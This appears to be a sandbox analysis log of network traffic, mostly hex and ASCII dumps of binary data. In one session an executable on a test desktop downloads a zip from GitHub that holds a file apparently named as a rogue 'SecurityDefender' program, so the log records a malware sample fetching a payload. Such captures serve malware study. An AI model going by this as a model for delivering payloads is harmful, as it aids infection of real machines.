                                                                                                                                                    2022-09-29 12:58:52 UTC592INData Raw: c2 6c 59 a4 7e 06 df a3 8c af f5 74 f5 8f 18 d2 5e ee ef 7a d5 71 23 9c ba cf 2e 45 f2 c0 1e 54 12 c6 72 02 6f 6d c5 16 cd ee d2 f3 e4 6f 24 c2 8c 09 8b 53 60 59 c9 2d d0 f8 2e 39 8b b6 8a 24 19 77 17 e7 e2 18 0a 74 2c 90 9d 07 13 f7 3c bf 95 4e 11 de b3 2b 18 f4 14 95 06 b1 6a ec 6f 27 19 3a f8 3d 36 4b 41 b5 2a e4 bb 59 a8 f3 23 fe 7c 16 ff 63 1e c7 3a a4 9c d4 e4 a1 9f 18 e8 3f 9e dd 9e 50 19 38 a5 06 d3 2a 0d 8f 93 ab b4 83 ad a4 1c fb 28 ca c5 8d 26 80 83 a7 b8 dd 6e 85 c7 00 3a 3d a0 0a 5f 54 03 e8 92 25 c6 67 40 eb a2 15 c8 56 d7 de 6b e8 9b 87 2a 95 a9 37 de fe 65 26 f8 85 20 82 76 72 0b 80 bb ad fe ce cb d4 c8 f8 e5 89 19 44 c1 5f 11 36 8d 6a 7e 95 aa a4 c5 ec 20 3c fc 85 77 1c 7e c2 60 3f 39 d8 55 2a 12 e9 cb 2f e4 35 0a 5b 53 69 cf 28 36 23 4c
                                                                                                                                                    Data Ascii: lY~t^zq#.ETromo$S`Y-.9$wt,<N+jo':=6KA*Y#|c:?P8*(&n:=_T%g@Vk*7e& vrD_6j~ <w~`?9U*/5[Si(6#L
                                                                                                                                                    2022-09-29 12:58:52 UTC593INData Raw: c7 90 79 b8 d8 da 89 03 65 0c eb 36 fb f9 de a7 f2 ed 71 e0 30 ab 13 69 70 eb 3d f3 9f b1 f6 07 79 60 ff 38 4f c4 e8 6f 16 71 73 bf 5a 78 22 bd b8 d6 7e 3a e1 1a 9b 08 2e 91 3e 14 08 49 ad c8 78 d0 99 89 4b 1c 05 cb 75 b8 29 93 15 78 77 1b d6 d3 d1 5b 33 26 ee 03 b7 07 4c dc a9 fc 3f 3b 61 b9 94 27 fe 45 4c ab 5a fc b4 bd cc 75 e1 4b 07 37 2a 6f 42 90 14 88 c9 78 c7 02 ce 68 4f 35 0c fe 34 16 a7 c4 35 f2 d5 1b c6 21 49 90 8f 8b 81 12 d5 27 6f b1 d6 9e 24 e2 b1 2b ab c4 4f 91 d6 c3 c0 62 34 e5 ed 6a 5f 0c a0 07 48 a9 70 b2 fb 84 2a 99 06 3b 18 62 ed 46 3a b7 78 78 93 a9 95 3f a1 13 04 78 37 6e 51 42 fd 58 cb db 80 f7 31 ad 66 71 fd ed 0e 71 6f 00 4c 90 d5 e2 a5 7b 77 4f 74 29 27 3e 4b 04 a3 7d 94 8b ed 3d fb b8 db 4c 3b 9e 71 8c c3 a2 0d f3 e8 02 3e 72 6b
                                                                                                                                                    Data Ascii: ye6q0ip=y`8OoqsZx"~:.>IxKu)xw[3&L?;a'ELZuK7*oBxhO545!I'o$+Ob4j_Hp*;bF:xx?x7nQBX1fqqoL{wOt)'>K}=L;q>rk
                                                                                                                                                    2022-09-29 12:58:52 UTC594INData Raw: dc 8e f3 15 82 7e 8b 36 8a 14 ca aa 8e 41 6c 35 9d 0d d3 9b 72 ce e0 af e2 32 1a d7 47 be a6 d2 87 8f fd bc 29 f9 25 8f 2b bf 7a ee 5f f5 d6 16 09 36 21 1d 1b 20 b9 48 44 06 96 07 64 89 2c 15 be 27 3d 6a f7 46 c9 18 87 f7 db 4f c4 72 15 b0 15 cf ae 94 fa 95 34 c9 d2 af f8 1d 30 b0 e5 d3 d8 2a ff 9c 8d 3f 39 cf f3 5f 61 1f 60 0d 94 59 52 c3 b7 18 c5 fb e5 f4 9c ec 79 d2 f7 3b d6 37 f6 3f 7e 97 88 a1 9b c6 f1 73 53 8c 59 89 1d 2b 0d 20 64 61 48 a8 13 85 8c fe 49 72 f6 c0 51 b4 6c 39 7c 99 bd e1 1a 0f e0 7b e2 38 ca 65 91 1c e2 b9 cf 36 36 94 47 96 20 7a 2f 86 a5 36 c3 58 f6 91 74 7f a6 67 ac 94 d3 8e cd 1c a1 d0 da 4d ce fd 8a c0 1f e7 50 64 89 35 a3 74 c8 5e 96 6f 66 fa 7e b5 ff 05 48 57 e8 b2 8e 94 aa 1b 0d 23 fd 07 ea e4 81 c3 1a 8e 1e 56 37 34 ce 99 87
                                                                                                                                                    Data Ascii: ~6Al5r2G)%+z_6! HDd,'=jFOr40*?9_a`YRy;7?~sSY+ daHIrQl9|{8e66G z/6XtgMPd5t^of~HW#V74
                                                                                                                                                    2022-09-29 12:58:52 UTC596INData Raw: 2d ca 24 f5 9c ba 58 c3 29 90 e0 47 6d 3b 4b 82 41 4c cd 3b 56 f0 d8 db 67 39 12 4d f3 e6 91 38 88 ae ce 0b 13 d1 50 ee 3d 34 b5 02 56 8b 0b 95 40 66 08 1a f3 27 9e 8a 88 26 af 84 c6 48 3f 27 d8 3c ff d4 b6 3d a4 96 bc d2 88 65 b6 ec 50 8d 36 b5 1b c6 ec 8a f0 5f d9 c7 77 21 78 f0 fd 9d 5d 02 d7 3f 71 21 da 7b e0 2a a6 b1 2f ed f7 87 c1 67 b2 55 9f 50 f2 93 8c d9 13 02 7b 84 a5 33 39 64 40 10 e2 dc ed ca 41 32 de e9 57 8b 47 ee 68 5b 78 d5 ef 8d 3e a5 c4 ed a5 04 0a 43 bf 54 b0 27 e6 dc fb 16 e3 7d aa 40 a6 8e 8a 07 41 9d 04 4e 1c 90 2f 33 a7 03 91 f4 79 ac 33 60 16 2f 36 6e 6d 26 e1 e6 d0 70 da d0 86 bd 47 9b 27 41 5c ee 80 e3 fb 37 ea 46 41 4e 52 bb 0c db 8b 84 a9 6d 1b 5e 23 47 5f 35 36 1a 66 8b 69 ae 2c cb 4c 55 80 97 de ad 9b bc 26 88 7e 39 d3 08 8c
                                                                                                                                                    Data Ascii: -$X)Gm;KAL;Vg9M8P=4V@f'&H?'<=eP6_w!x]?q!{*/gUP{39d@A2WGh[x>CT'}@AN/3y3`/6nm&pG'A\7FANRm^#G_56fi,LU&~9
                                                                                                                                                    2022-09-29 12:58:52 UTC597INData Raw: 85 af 37 94 7b c6 f5 45 db 21 f7 74 2f 62 98 10 2c d3 f0 06 42 b9 d3 2b c7 24 9d ff 0a a3 22 27 c4 9b 56 ee c9 5d 9f eb 18 6b cc 6d 3b 94 27 fc df 30 73 39 f8 9f 49 cb ba 13 34 65 b1 cb f7 50 97 73 02 e5 cc f8 16 29 f9 fd ba d3 f5 38 37 09 01 af fd d9 97 ae 3b 51 ec 53 25 57 bd 7e bc ba d7 c6 4e e4 2e e2 ab de e6 6f 6f 9c 43 f9 5a 6d 9c af 76 15 02 59 43 56 55 01 1e 24 cb 77 24 de a4 e0 48 e0 9c 0c c7 7e d7 6d fc 2d ec 24 4b 8e c3 03 d5 27 75 da d8 cd f8 4f 8b 1c df fe 8b 7d d7 20 f1 50 e6 a5 0b 7a c8 6e e6 c7 b5 98 29 24 89 d4 76 15 84 d3 bf a3 16 63 62 4b ed 80 0f 3f 1d 4a fb 21 b0 04 e0 fc 51 9e df b8 2a eb 13 bb ef bb c2 dc f1 7e 0a 09 1f 3e 8d 0a 5e 33 d8 1b f5 78 da 6a 8e 5a 4d 40 d5 0f 11 5d b9 27 16 4b 0b 75 8e 11 1f 7c 39 82 d0 65 f2 b0 9c b9 f9
                                                                                                                                                    Data Ascii: 7{E!t/b,B+$"'V]km;'0s9I4ePs)87;QS%W~N.ooCZmvYCVU$w$H~m-$K'uO} Pzn)$vcbK?J!Q*~>^3xjZM@]'Ku|9e
                                                                                                                                                    2022-09-29 12:58:52 UTC598INData Raw: c6 2f 88 a8 1b d7 b6 59 34 af 0e 54 ff cb 92 25 2a e6 68 38 27 80 7b 48 b0 f5 b9 ce ac cb 1d 2a fd a0 8c 20 1b bc 1b f2 03 c7 99 06 8e 9e d9 b8 30 db b3 53 44 a0 e4 0b a2 c3 0d d6 85 47 fa e0 7c 66 45 ac 83 c2 8b f1 93 08 12 40 95 8f ab ce e4 2e 4e c8 3f 7b c1 64 02 75 0e a0 89 28 4b 5f a7 1f 1a 17 92 89 61 94 69 0f 14 5f 0b f0 33 e1 16 bd 9e 23 9a 33 67 d5 1e db 6f e2 77 ac 55 ca 94 90 61 05 5c 7d 4f 3b 4e b8 91 26 6f db 5c 09 1e ca 72 cf 52 0b be 6f 6c 8a 3a ea e7 b5 0b 07 46 49 e4 fb a1 b9 49 59 92 a8 6d 40 a1 a5 7b bf 8e fe 50 8b 2c 00 06 90 6d 23 f7 51 ba a4 a5 ee 5d 52 b5 fc 8a ab 56 2f e7 e3 fc 29 0e 2f e2 70 82 ce 4b e9 f3 f5 7b eb 3b 40 af a6 69 1f 0b 01 be 84 89 56 7b 6e 23 61 a8 3a 74 69 90 7b 27 d9 8e 66 d1 6b e5 cf 9c 49 de 22 0f a8 54 6f ef
                                                                                                                                                    Data Ascii: /Y4T%*h8'{H* 0SDG|fE@.N?{du(K_ai_3#3gowUa\}O;N&o\rRol:FIIYm@{P,m#Q]RV/)/pK{;@iV{n#a:ti{'fkI"To
                                                                                                                                                    2022-09-29 12:58:52 UTC600INData Raw: 32 b1 6c 7c 05 84 57 c8 2c c7 2f 11 e6 09 07 62 fd b1 78 16 7e 07 2b 0d 19 cc eb 17 3e d0 eb 2e a6 19 7a 4a d4 63 34 33 9b 1f 1d c9 f0 7c f4 65 14 fd 1d af f3 5e 2b 84 20 49 bf 14 10 36 f9 94 ea de 28 e1 e6 c1 24 b1 52 0b 8b 10 f8 cb 56 c9 84 ae 54 14 4b 80 cc b3 40 9e c0 b1 98 42 dd af 1d 20 ab 14 96 8a c9 54 a0 90 5f 30 23 ec 68 b6 9b e5 d1 5b d5 cc 4b eb 3c db 98 19 e5 6f 2f 70 a9 c7 9b 0c ad cb 22 1a 07 0c 38 5a 29 e0 d8 0a 9d db 9a 33 81 04 9b ff 95 dd 26 ee b9 c3 d1 ee a3 06 f5 e4 5a 80 5e 50 19 a3 7d 56 17 60 6a f8 0e cb 4f 74 37 1e 0c 6c 4a b1 ea d2 4e a7 51 ec 8d 8e d5 f5 98 f5 3e 0f f5 2b fb b2 44 aa d2 ef 6a 7a 23 ba 62 50 5b 27 81 88 7c 91 11 71 36 01 33 61 d4 96 e6 fa d2 46 9b e0 f6 e4 ce 5b 21 39 b3 56 b7 be 8b a4 00 44 be b8 7a 94 67 2b e0
                                                                                                                                                    Data Ascii: 2l|W,/bx~+>.zJc43|e^+ I6($RVTK@B T_0#h[K<o/p"8Z)3&Z^P}V`jOt7lJNQ>+Djz#bP['|q63aF[!9VDzg+
                                                                                                                                                    2022-09-29 12:58:52 UTC601INData Raw: 31 c5 14 a1 df 68 f3 a8 20 e3 c5 b4 58 ba 54 57 49 8e db c3 36 b2 f7 74 f1 f8 c3 78 89 12 a5 8f ab 92 61 6a 62 a6 33 7a 20 4a e4 d7 39 2c 1f a8 f3 a7 4d d5 0f 26 21 8a 0a 73 4f 8e 20 56 68 a0 9d d5 8c 79 39 b4 4c 47 81 90 cc 6f e0 5f e1 63 e3 5f 10 f7 ee 8a 3d 8d 14 e0 3f af 46 e7 9b bc d8 a7 25 98 a4 7c a6 bb 11 af 6a e3 80 cf 9b 2d b2 e4 90 fd 45 66 4c fe 80 b8 27 b2 07 07 7b 99 69 8f f2 c6 4f 0e 2d 03 51 15 d4 7e 1f 14 74 45 cd 53 a6 6d c7 f3 2a 2b c2 2d 01 81 05 08 b2 54 b0 87 e2 74 43 39 32 57 04 b3 81 c4 b7 7b 77 d6 d7 f5 c3 43 00 4f 49 a0 cb 4b 9c 2b c2 d9 56 02 38 31 b8 b9 f2 ea a1 9a c0 ce c3 cc 75 a4 c4 ab e7 92 76 7d 1c b2 23 c2 f3 75 96 8d c0 24 52 8a 5f a6 42 59 8a 94 89 ec 01 4e c9 ac 72 de 43 85 22 db b2 ee 4b e1 b5 a3 31 5a 6b 2a ab ff 85
                                                                                                                                                    Data Ascii: 1h XTWI6txajb3z J9,M&!sO Vhy9LGo_c_=?F%|j-EfL'{iO-Q~tESm*+-TtC92W{wCOIK+V81uv}#u$R_BYNrC"K1Zk*
                                                                                                                                                    2022-09-29 12:58:52 UTC602INData Raw: bf c3 4c cc f3 48 a1 f1 37 d0 a5 1b bf 67 33 3f 75 bd 10 d0 df 9d df 59 4c 1a 53 35 51 a1 69 ca 07 cc 5c e4 89 8c 25 6e fd c5 a8 3f 23 f1 f8 05 24 25 9d f6 0c a0 33 dc df ef 13 9b 51 cd 61 95 b7 8f 15 32 af 9b f4 a4 de b4 4c 9d d3 11 7a 04 48 63 81 81 a4 d5 0e b3 e6 f9 8a b9 a0 83 55 0d 51 a0 0f c6 cb 99 41 57 9c 01 6e 08 0a 8f 72 56 60 89 1e 3b 80 ed a5 c7 1b 53 82 bb c6 59 5b 4e 3c e7 07 ba 30 46 90 4b c3 9f 52 05 6c 7a a6 06 3b 6f 9d d2 ab 5b 89 26 4e 52 02 80 e6 32 c9 2a ae c9 30 5b fb a2 5d d5 79 87 ec b3 40 0a b3 3a f0 27 62 4a 5c 57 1d 5f 1b 4f 20 82 50 0e 87 59 b6 a6 2d b1 da 89 dd f0 a9 a4 3e 00 d8 0a 3e ee 3a 9e 0f a3 6c 69 89 fe dd 3b 98 b9 d0 dc 45 b7 53 ac 78 9f e1 e6 6c a1 a7 e8 45 23 0c 9f a9 81 ba 7f 70 23 e1 ac f1 a0 08 bd 47 7f 5e 2f f9
                                                                                                                                                    Data Ascii: LH7g3?uYLS5Qi\%n?#$%3Qa2LzHcUQAWnrV`;SY[N<0FKRlz;o[&NR2*0[]y@:'bJ\W_O PY->>:li;ESxlE#p#G^/
                                                                                                                                                    2022-09-29 12:58:52 UTC604INData Raw: 3a 7d 7f b8 ac 6a 77 3e 70 4b 17 88 5b f2 ca 0d b1 32 ae 01 76 af 8d e9 cf de 6f be 1b b6 cb bb ac 98 41 c9 b3 c2 1a ac 33 a2 dc 94 f4 38 d2 37 7f a3 c0 88 9a bb e1 3c 6e 86 33 f9 fa 4c 7c 24 ae 50 0b 11 1b 65 f0 61 28 8c e3 8d af 67 de f2 ec 0c 2d a3 2e a8 d5 41 f7 0a d3 13 66 da 0c 99 fa b5 4d 77 4d 59 f4 79 fd 58 87 dc 71 ad 2e 76 7a 58 cb 0f 1f c1 e8 4d 7d 1a d0 f6 a4 49 97 96 12 6f 43 8b e4 e3 d4 86 6d 86 cc d5 0f ea f2 b0 d3 c6 40 6e 75 72 e8 25 70 4b b7 5b c6 ed 59 32 27 b8 2b a1 f1 17 29 63 0f d1 5f bc 32 44 e4 d4 50 a6 8b 35 74 ff 15 ae a5 ae 75 48 bd 30 0b 24 70 e3 07 9c 7f d1 d2 68 ab dd c2 8e d5 78 7b 55 80 83 4f f6 cf f6 22 a8 7e a1 4a 86 2b b3 05 97 90 53 20 41 e1 cc 34 6f d9 18 7f f7 20 fb 5d 33 b3 dd 9b 15 77 77 ab 91 92 6c c9 45 69 86 5e
                                                                                                                                                    Data Ascii: :}jw>pK[2voA387<n3L|$Pea(g-.AfMwMYyXq.vzXM}IoCm@nur%pK[Y2'+)c_2DP5tuH0$phx{UO"~J+S A4o ]3wwlEi^
                                                                                                                                                    2022-09-29 12:58:52 UTC604INData Raw: 87 81 9f a1 72 30 0d f3 fc d2 35 43 d9 5c 1d 9f 00 a8 c9 af 5f ba 08 6d 37 6f 12 47 40 02 85 7c 44 cf 6d 40 dc c2 56 32 20 ce 6a 8d 7b 1d 95 37 b4 9a 63 62 9e 38 fa f3 fc 16 7d b5 a5 7f d3 a1 02 f9 29 64 f4 9f de d7 37 31 9e 27 f4 0e 5d 94 bb d8 d6 1d 09 9b c0 58 d3 1a 67 99 47 ab c9 8d db 28 53 8e 4c c6 75 4a 51 bc 95 4a 87 eb 5a 44 65 b0 3a 1d 36 8e 5c 0d de 29 77 67 e2 34 0a d0 54 dc 5d 86 76 1c 08 89 a8 d1 7f fa bb 06 40 e7 d9 d0 40 92 8e ff fb 46 e9 9b 9f ce 93 a1 0e a2 62 d3 77 e5 91 a0 12 aa 37 42 94 7f 9a 5e 40 96 6b ef ea 52 4a c7 b2 f4 8a 5a d7 11 14 d1 36 db 7c a4 d3 9d d8 89 36 d7 61 73 09 07 84 0a 97 68 dd d8 eb 02 48 bb 5f ee bb 4c 5d c8 6f 50 22 39 b6 ab 6b f0 c8 73 53 8c 87 dc cc 4b 78 10 3b f7 69 c8 ef 82 d9 e1 31 6f e4 66 51 87 79 81 d6
                                                                                                                                                    Data Ascii: r05C\_m7oG@|Dm@V2 j{7cb8})d71']XgG(SLuJQJZDe:6\)wg4T]v@@Fbw7B^@kRJZ6|6ashH_L]oP"9ksSKx;i1ofQy
                                                                                                                                                    2022-09-29 12:58:52 UTC620INData Raw: 90 70 30 94 7c 1f ae 95 d5 92 33 05 5e 83 44 07 53 00 08 8e 48 e9 a0 43 02 63 f5 3c 1e c1 c7 9b 86 f8 8f 5d 3a 41 ea 32 ac 5b e0 e2 6a bb 73 00 aa 24 2c e1 70 64 a5 34 cc cc a9 8f 1b 98 42 22 12 dd 7f 86 b0 81 51 12 1b b1 e0 38 be 82 0b 50 50 bd ff 83 b1 5d 38 cb ab 97 f7 b8 9a 05 69 12 96 b2 98 8d f2 1f a9 04 cf a1 e7 8c 45 b6 0d ef 7f 87 0b 0a 2a 08 b5 59 28 9a 8c 2c fd 34 3b dd 4c 6d 37 d0 4f a5 8e 58 92 16 46 91 44 d6 b9 62 8f c1 3c c7 a3 d0 ee 54 24 7e 5a b0 a6 f8 c7 94 b3 2d 05 e8 3d c0 9d f3 6e 33 10 83 e2 e4 49 b8 e3 3b 38 a2 a3 66 ff 6b 37 9a 66 5e ad 4c 04 9c 5e eb b8 3c 50 6a 96 36 b2 1b 99 86 22 60 c8 af dc 06 df 1e 74 d8 e8 72 fa 48 bb ff d3 32 23 dd fe c8 02 3e fc 5b d2 c2 1f c2 32 6f a6 c8 fb 8c 8b 26 7d b1 89 4f 39 27 e6 76 bf 49 06 d1 ad
                                                                                                                                                    Data Ascii: p0|3^DSHCc<]:A2[js$,pd4B"Q8PP]8iE*Y(,4;Lm7OXFDb<T$~Z-=n3I;8fk7f^L^<Pj6"`trH2#>[2o&}O9'vI
                                                                                                                                                    2022-09-29 12:58:52 UTC636INData Raw: 14 6b b2 4b d1 9b d4 f9 95 6d b2 6d e6 23 e8 ff 53 7b f4 05 2a 3f 53 a3 a1 66 89 c1 91 dd 62 a6 bb 72 f3 a5 95 99 34 6c 7b df 00 c6 2a f8 23 95 d7 4f e8 b1 cb e5 c3 d6 2a fd a5 50 a8 97 23 5b 0f 79 b4 be b4 1d e1 45 6c 47 7a 5e 6d 5f f8 4a 2d 87 dc 55 c3 3f 5b 0e db b4 a0 f0 10 2b a3 6b 92 6b 87 c1 6b 69 18 aa 01 57 30 a7 22 32 76 21 22 62 db ed 73 ff 80 48 2d 27 ce f0 6e e4 fe 7a 24 12 d8 16 d7 fa 42 05 1b 4c d0 88 1e 7e 64 b1 0b 90 07 fb 36 c0 73 30 5c c5 77 41 f5 fc 63 d0 8a b3 f9 85 ff 58 4f 0c 4f d4 c2 59 a0 b7 98 6b 4e a0 79 0c 07 61 ee 51 ed 43 35 13 04 93 60 c6 7c 35 da fe b1 0f cd fa c9 3e a3 95 ce 1e ac f8 4b 9b 3b b0 aa d2 15 dc 45 8b 30 2a 32 b4 74 6c 02 14 ec f6 67 1c a5 3d 71 46 e5 78 5a 26 fa e9 29 b4 9e 44 d4 b8 8c 31 7d f3 9b af a9 31 44
                                                                                                                                                    Data Ascii: kKmm#S{*?Sfbr4l{*#O*P#[yElGz^m_J-U?[+kkkiW0"2v!"bsH-'nz$BL~d6s0\wAcXOOYkNyaQC5`|5>K;E0*2tlg=qFxZ&)D1}1D
                                                                                                                                                    2022-09-29 12:58:52 UTC652INData Raw: 41 9a 8f 83 8f 02 7a cb 37 bb fd ca e7 a7 e0 3f 90 12 79 fa be c2 e9 9e 5f 68 cb 77 27 0f 26 34 5f f3 93 84 61 50 7a 3f ac 9b f4 5b 64 ff 5b ff 80 30 d6 60 af a3 8d e3 f4 cd d7 cc 1a 31 ca 5d 22 56 ac 1a a4 13 9c 47 97 6c 4b 01 55 df 3e aa 28 08 a9 aa 33 01 da 53 80 ce 06 4f 87 77 db 82 4c 6f 01 28 8e f6 7a 6e 66 44 56 cb b8 66 4f 24 25 90 f1 3c 10 5e 7c f5 09 94 4f b5 fa dc 84 d2 1d f1 a6 6c d4 3b 14 52 55 e9 b4 67 61 b8 43 72 bb 7e 46 63 a5 d0 b4 1c 38 71 d2 74 e5 81 f8 f0 ae 78 eb 70 1c a4 01 da 90 f8 43 d8 2f 82 ac 11 ce 1e 3d f3 5a 91 d6 8e 2f d7 19 9c b1 21 02 df f9 bc 5d 55 6d 89 4e 4c 42 48 68 bd f8 45 40 c5 d5 88 6c 42 bf 67 a4 c7 c2 dd 0c 1f a8 2d bc 92 e9 29 51 d1 4d 55 81 df 41 07 0f bb 54 1f 79 2e 19 f7 8c 61 32 c1 6b a2 5a 36 1b 80 ac af f4
                                                                                                                                                    Data Ascii: Az7?y_hw'&4_aPz?[d[0`1]"VGlKU>(3SOwLo(znfDVfO$%<^|Ol;RUgaCr~Fc8qtxpC/=Z/!]UmNLBHhE@lBg-)QMUATy.a2kZ6
                                                                                                                                                    2022-09-29 12:58:52 UTC668INData Raw: 95 8b a4 c6 2c b0 5b 51 9f 28 9a f8 06 45 2f d9 53 4a 0a c1 b4 c5 63 2f 1d ba 07 6a 18 13 45 9c 18 a2 05 d3 87 18 b1 10 23 2e 1d 3c c2 06 dc bd 37 04 56 d0 b1 41 08 ed 33 fd 40 e7 7b 08 66 31 17 88 e1 81 ab eb d5 ea 29 55 31 01 ee f6 3b 22 54 0e 4e 1c e6 31 62 b2 3f f9 88 92 3e c1 f0 21 93 b6 2e 9a bf f8 88 a5 b0 b4 b4 40 a4 1c c9 e4 4c 0c 76 23 0b d0 ea 79 8b c3 26 0a 60 49 28 c4 4e 32 5e bd 4e 17 bb cb b8 22 27 03 dd c2 c1 dc a8 ec 04 c8 e5 e5 fd c1 a6 49 85 ca 24 d5 5f 9c 98 45 a8 72 bb cb 36 ce 71 49 bc 1c a1 d2 59 30 f7 f2 42 18 1b b8 d1 73 6f 84 8f eb ae 03 da 14 11 53 12 e2 f6 96 bb 07 f8 95 86 5b c9 f1 ba cd 92 3f a9 ef c7 95 fa 3a fa dc 76 1e c6 bd a1 c2 55 1d 08 21 55 e5 02 df f2 10 f0 9b b0 85 d3 66 75 cd dc b2 d6 03 d7 4e e3 65 b2 fd 64 18 15
                                                                                                                                                    Data Ascii: ,[Q(E/SJc/jE#.<7VA3@{f1)U1;"TN1b?>!.@Lv#y&`I(N2^N"'I$_Er6qIY0BsoS[?:vU!UfuNed
                                                                                                                                                    2022-09-29 12:58:52 UTC684INData Raw: fa 3f 97 e0 b2 12 61 ba ea fd 30 36 3e 33 2e 0d cb 94 43 4b 7f 6d e9 43 11 8f d1 94 a5 b5 3f 40 5a c7 29 35 20 35 d1 12 36 f9 57 23 5b 7a 0e 2e 88 72 ae 0f 41 2a 34 00 83 72 eb ab bd 5c f0 9b a1 f4 bd 88 57 cf 32 6b 94 96 b7 80 a7 19 49 6d e4 76 46 ec a4 f5 42 b3 9c 43 c8 02 6c 3c 25 b3 b8 07 ff fa 90 64 cb 1b 99 08 cc b2 00 92 b3 4d 0e 07 e8 98 ce ff 11 b2 c4 d1 d7 49 32 d5 af 8b 37 2b 02 0f 65 74 6e c2 a2 75 c9 8d 44 49 8f e8 8f c7 d2 19 32 e2 b8 0f b6 39 aa b4 22 69 74 48 26 18 94 39 48 8b 1f a8 3e 91 d3 de 7a db 67 c1 10 69 3a 03 77 42 7c 09 16 db c0 da 3d de b5 3b fd 81 eb 47 de 8f a3 d6 2d 78 4c f8 e3 ec c2 a0 cb 85 4e 5f 59 99 08 3c 2c f1 91 7a c1 87 db 83 a7 56 2d 37 32 21 a2 56 10 30 09 db 21 ed ae e3 1e da 65 8d 86 a0 87 f4 5b 94 f7 e6 fd b6 de
                                                                                                                                                    Data Ascii: ?a06>3.CKmC?@Z)5 56W#[z.rA*4r\W2kImvFBCl<%dMI27+etnuDI29"itH&9H>zgi:wB|=;G-xLN_Y<,zV-72!V0!e[
                                                                                                                                                    2022-09-29 12:58:52 UTC700INData Raw: 2b d8 98 c8 88 9a 66 69 3e 09 bd a4 64 cb b9 ca c5 57 db d2 d1 ea 2a 11 5f 40 32 44 6c 77 33 94 1e 74 46 c4 b2 98 3b c0 aa 5f 48 f2 8e 23 88 fb da be 6f 9a b8 f7 2e bc d1 34 c6 be 18 c3 90 95 17 02 08 0d 50 2a 20 90 82 12 03 aa 77 eb 32 bd 04 f1 91 92 d2 17 5c 85 52 4d 01 e1 ae a6 41 79 19 fe 43 5c 1b f6 d8 22 a5 26 b7 14 35 bf 4d 4c a5 22 bd 8b b3 89 9d 0e 45 31 8a 10 cf ea 62 43 af 9d 69 4c 01 6c bd 9e 53 b5 f7 15 c5 f8 d2 eb 58 dd e1 77 b0 d8 1f ea 54 38 36 8d 37 8f 56 61 b9 85 86 2b f1 9d 15 f1 fb 19 b2 45 da 9f e5 c9 7c a8 36 69 ce 4b 9a 2b 25 98 e5 f6 de 57 1b a7 07 e2 e0 08 42 6b 77 72 fd fa 49 b5 47 59 3e da 53 3e 99 b1 d3 39 0c 49 0e ba a8 f7 6e 56 1d f7 0c 28 f5 b3 59 06 99 57 15 19 0a 26 7f a1 d7 f7 26 63 e9 9a 62 9d fa 6f b8 a9 25 0b 2d 7d 05
                                                                                                                                                    Data Ascii: +fi>dW*_@2Dlw3tF;_H#o.4P* w2\RMAyC\"&5ML"E1bCiLlSXwT867Va+E|6iK+%WBkwrIGY>S>9InV(YW&&cbo%-}


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    120185.199.108.133443192.168.2.349767C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:59:21 UTC30712INHTTP/1.1 200 OK
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 1423299
                                                                                                                                                    Cache-Control: max-age=300
                                                                                                                                                    Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                    Content-Type: application/zip
                                                                                                                                                    ETag: "4e2f97a693b42bbc4ce7b3f548d6798cfcb4829d26d0a219f2fbeb3332111530"
                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                    X-Frame-Options: deny
                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                    X-GitHub-Request-Id: 080B:4559:687049:6EBFD9:63359362
                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                    Date: Thu, 29 Sep 2022 12:59:21 GMT
                                                                                                                                                    Via: 1.1 varnish
                                                                                                                                                    X-Served-By: cache-mxp6968-MXP
                                                                                                                                                    X-Cache: HIT
                                                                                                                                                    X-Cache-Hits: 1
                                                                                                                                                    X-Timer: S1664456362.797447,VS0,VE186
                                                                                                                                                    Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                    X-Fastly-Request-ID: f00c6f6846a8280fd864d73b31f9fd9bd4cdacca
                                                                                                                                                    Expires: Thu, 29 Sep 2022 13:04:21 GMT
                                                                                                                                                    Source-Age: 0
                                                                                                                                                    2022-09-29 12:59:21 UTC30712INData Raw: 50 4b 03 04 14 00 01 00 08 00 95 9e 9e 43 97 d5 73 7c ff b6 15 00 00 f8 16 00 1f 00 00 00 45 6e 64 65 72 6d 61 6e 63 68 40 53 65 63 75 72 69 74 79 44 65 66 65 6e 64 65 72 2e 65 78 65 99 68 63 5c 94 3d bf 63 47 e4 03 fb 1f c1 b9 4b 20 11 2d 75 48 62 84 af 67 6b 4a 77 75 39 5b 1d 02 85 b0 24 36 21 49 0f 58 81 53 67 5b f9 24 6a d8 ea 82 da 51 26 14 8f bd 4f dd 51 7d f0 d8 d1 cc e5 9c b9 dc 08 c1 ad ec 4e 39 18 4a 21 c9 21 be fb 52 0b 0f 59 6c 23 9f f1 34 d2 ec c1 7f 93 35 11 14 3e ab 80 17 a2 b2 24 c6 3d 5b f4 66 4a 22 1d 94 00 0e 54 5f c3 dc 4a 42 eb 35 61 3a 44 06 ba a0 fc e5 08 55 c0 85 99 e8 cd f7 78 ae 86 5d 33 30 3f 92 ef 90 fe ee c4 90 a1 df 26 b7 20 a9 1e b8 31 9e 24 00 ce c9 50 af 1a f1 9e c4 46 03 86 41 f3 24 e2 fa 15 24 a2 97 c6 0d ff 8f 21 a1 b5
                                                                                                                                                    Data Ascii: PKCs|Endermanch@SecurityDefender.exehc\=cGK -uHbgkJwu9[$6!IXSg[$jQ&OQ}N9J!!RYl#45>$=[fJ"T_JB5a:DUx]30?& 1$PFA$$!
